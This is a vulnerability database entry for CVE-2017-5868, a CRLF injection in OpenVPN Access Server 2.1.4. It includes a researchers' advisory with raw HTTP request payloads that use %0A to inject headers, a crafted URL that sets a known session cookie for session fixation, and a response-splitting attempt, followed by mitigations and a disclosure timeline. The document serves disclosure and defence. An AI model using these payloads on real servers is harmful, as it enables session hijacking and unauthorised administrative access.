Vulnerabilities > CVE-2017-5868 - CRLF Injection vulnerability in Openvpn Access Server 2.1.4

047910
CVSS 6.1 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
LOW
Integrity impact
LOW
Availability impact
NONE
network
low complexity
openvpn
CWE-93

Summary

CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via "%0A" characters in the PATH_INFO to __session_start__/.

Vulnerable Configurations

Part Description Count
Application
Openvpn
1

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Command Delimiters
    An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
  • Web Logs Tampering
    Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/142696/openvpnas214-crlf.txt
idPACKETSTORM:142696
last seen2017-05-27
published2017-05-27
reporterJulian Boulet
sourcehttps://packetstormsecurity.com/files/142696/OpenVPN-Access-Server-2.1.4-CRLF-Injection.html
titleOpenVPN Access Server 2.1.4 CRLF Injection

Seebug

bulletinFamilyexploit
description### Description OpenVPN Access Server is a full featured secure network tunneling VPN software solution that integrates OpenVPN server capabilities, enterprise management capabilities, simplified OpenVPN Connect UI, and OpenVPN Client software packages that accommodate Windows, MAC, Linux, Android, and iOS environments. OpenVPN Access Server supports a wide range of configurations, including secure and granular remote access to internal network and/ or private cloud network resources and applications with fine-grained access control. ### CRLF injection + Session fixation OpenVPN-AS (Version 2.1.4) is prone to CRLF injection. Using the character %0A, it is possible to inject headers and content. Furthermore, this vulnerability allow us to exploit a session fixation attack. Indeed, during the authentication the session cookie is poorly handled. We have not been able to exploit it but the application may be prone to HTTP Response Splitting attacks. ### Threat Exploiting these vulnerabilities, we were able to steal a session from a victim and then access the application (OpenVPN-AS) with his rights. Exploiting this on an administrator account may lead to serious consequences. ### CRLF injection It is possible to inject a CRLF character like `%0A` using the URL : `https://www.mysite.com/__session_start__/` ``` GET /__session_start__/%0atest HTTP/1.1 Host: www.mysite.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Cookie: openvpn_sess_******=******dc61 Pragma: no-cache Cache-Control: no-cache ``` As a result, we obtained this response from the server : ``` HTTP/1.1 302 Found Date: Wed, 18 Jan 2017 10:19:46 GMT Connection: close Content-Type: text/html; charset=UTF-8 Location: https://www.mysite.com/ test Server: OpenVPN-AS <html> <body> <p>REDIRECT</p> </body> </html> ``` Thus, the `%0A` character is taken into account and we can clearly see the test string at an unexpected location. ### Using a CRLF injection in order to do a session fixation attack Using the CRLF injection and a problem during the authentication phase (the session cookie is not re-generated), we were able to successfully exploit a session fixation vulnerability. In order to exploit this vulnerability, we followed the steps below : * As the victim, access the OpenVPN-AS application in order to obtain a valid session cookie (at this point, the victim is not authenticated). * Sent a malicious URL to the victim in order to set his session cookie. As an example, we aim to inject a Set-Cookie header with a known value : ```https://www.mysite.com/__session_start__/%0aSet-Cookie: openvpn_sess_******=******cf23; Path=/; Secure; HttpOnly``` This URL will allow the attacker to choose the value of the session cookie of the victim. * At this point, the victim needs to authenticate itself. His profile (and rights) will then be associated with the session cookie controlled by the attacker. * Finally, as the attacker, we can access the OpenVPN-AS application with the rights of the victim (using the session cookie). ### Tries for an HTTP Response Splitting attack We also tried to exploit an HTTP Response Splitting attack without success, for now. ``` GET /__session_start__/%0aSet-Cookie:%20openvpn_sess_******=******ac42;%20Path=/%0aContent-Length:%200%0a%0aHTTP/1.1%20200%20OK%0aContent-Type:%20text/html%0aContent-Length:%2017%0a%0a<html>TEST</html> HTTP/1.1 Host: www.mysite.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Cookie: openvpn_sess_******=******dc61 Pragma: no-cache Cache-Control: no-cache ``` As we can see, it is possible to use multiple times the character %0A, in order to forge another response. ``` HTTP/1.1 302 Found Date: Wed, 18 Jan 2017 10:29:23 GMT Connection: close Content-Type: text/html; charset=UTF-8 Location: https://www.mysite.com/ Set-Cookie: openvpn_sess_******=******ac42; Path=/ Content-Length: 0 Content-Length: 171 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 17 <html>TEST</html> Server: OpenVPN-AS 3b <html> <body> <p>REDIRECT</p> </body> </html> 0 ``` ### Solution The vendor didn't provided a patch for this vulnerability. However, several solutions can be taken : * Use a Reverse Proxy in order to restrict CRLF characters in URI. * Restrict access to the web interface (for instance, IP whitelisting). From the vendor side, several steps need to be taken: * CRLF characters must be escaped * Session cookie must be re-generated during the authentication ### Timeline (dd/mm/yyyy) * 18/01/2017 : Initial discovery. * 06/02/2017 : First contact with OpenVPN Security team. * 13/02/2017 : OpenVPN Team request to file a ticket on the Access Server support system. (#IFX-370-42406) * 17/02/2017 : Reply from the owner, acknowledging the vulnerability and planning to fix the vulnerabilities. * 29/03/2017 : Sysdream Labs request for an ETA, warning for public disclosure. * 21/04/2017 : New request for feedback. * 04/05/2017 : Another and last attempt. * 23/05/2017 : Public disclosure.
idSSV:93164
last seen2017-11-19
modified2017-05-27
published2017-05-27
reporterRoot
titleOpenVPN Access Server : CRLF injection with Session fixation(CVE-2017-5868)